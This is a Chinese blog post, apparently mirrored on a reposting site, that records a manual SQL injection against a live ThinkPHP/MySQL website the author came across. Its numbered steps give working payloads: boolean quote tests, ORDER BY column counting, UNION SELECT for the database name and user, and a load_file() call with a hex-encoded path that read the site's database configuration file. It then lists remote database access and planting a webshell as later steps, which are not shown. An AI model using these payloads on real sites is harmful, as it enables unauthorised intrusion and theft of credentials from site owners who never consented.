zoukankan      html  css  js  c++  java
  • 记录一次伪静态注入

    记录一次伪静态注入 

     

    0x01:前言

    偶然得到一个站,顺便练习一下手注,记录一下过程

    0x02:辨别伪静态

    网站url结构:

    是不是类似index.php?pid=2,感觉有猫腻的话就顺手试一下。

    改变url为

    发现未屏蔽报错,且暴露了部分信息

    可以得出数据库为mysql,且网站框架为tp,基本可以确定是伪静态了,这就意味着/index/pid/2.html等同于/index?pid=2.

    0x03:快乐手注

    先fuzz一下有没有被waf的关键字,很快乐,一个都没被waf掉

    开始注入:

    1、payload:index?pid=2’and ‘1’ = ‘1,网页正常。

    2、payload:index?pid=2’and ‘1’ = ‘2,网页报错。确定注入点存在且为字符型注入。

    3、猜字段:payload: index?pid=2′)order by 1 — +,网页未报错。

    payload: index?pid=2′)order by 2 — +,网页未报错。

    payload: index?pid=2′)order by 3 — +,网页未报错。

    payload: index?pid=2′)order by 4 — +,网页报错。

    这里顺便说一下order by 的实质意义吧:order by 实际是猜查询出的列数,而不是表实际的列数。order by本来就是指定的结果如何order,针对的就是查询结果而不是原表。所以order by猜解得到的列数还跟在后端的逻辑有关。

    详细可见 https://segmentfault.com/a/1190000002655427

    4、查找可显示字段:

    payload: index?pid=-2′)union select 1,2,3 — +。

    5、查询当前数据库:

    payload: index?pid=-2′)union select 1,database(),3 — +。

    6、查询当前用户权限:

    payload: index?pid=-2′)union select 1,user(),3 — +。

    7、 利用报错得到的路径信息,结合ThinkPHP的目录结构,依次测试可能路径。发现配置文件在此路径下。

    读文件/alidata/www/Application/Common/Conf/config.php成功得到了数据库的配置文件。

    payload: index?pid=-2′)union select 1,load_file(0x2f616c69646174612f7777772f4170706c69636174696f6e2f436f6d6d6f6e2f436f6e662f636f6e6669672e706870),3 — +

    8、远程连接数据库:

    9、写个小马儿:

    10、连接:

    GG ······

    0x03:先放着吧,过几天再搞,心累

  • 相关阅读:
    mac 格式化U盘
    SSD接口详解,再也不会买错固态硬盘了
    详解Paste deploy
    (实用)Ubuntu Linux静态IP网络配置
    Python WSGI开发随笔
    利用CA私钥和证书创建中间CA
    使用OpenSSL创建自己的CA root certificate
    创建自己的PKI公/私密钥对和公钥证书
    openssl创建自己的CA certificate
    Keystone中间件WSGI环境变量总结
  • 原文地址:https://www.cnblogs.com/pureqh/p/10911828.html
Copyright © 2011-2022 走看看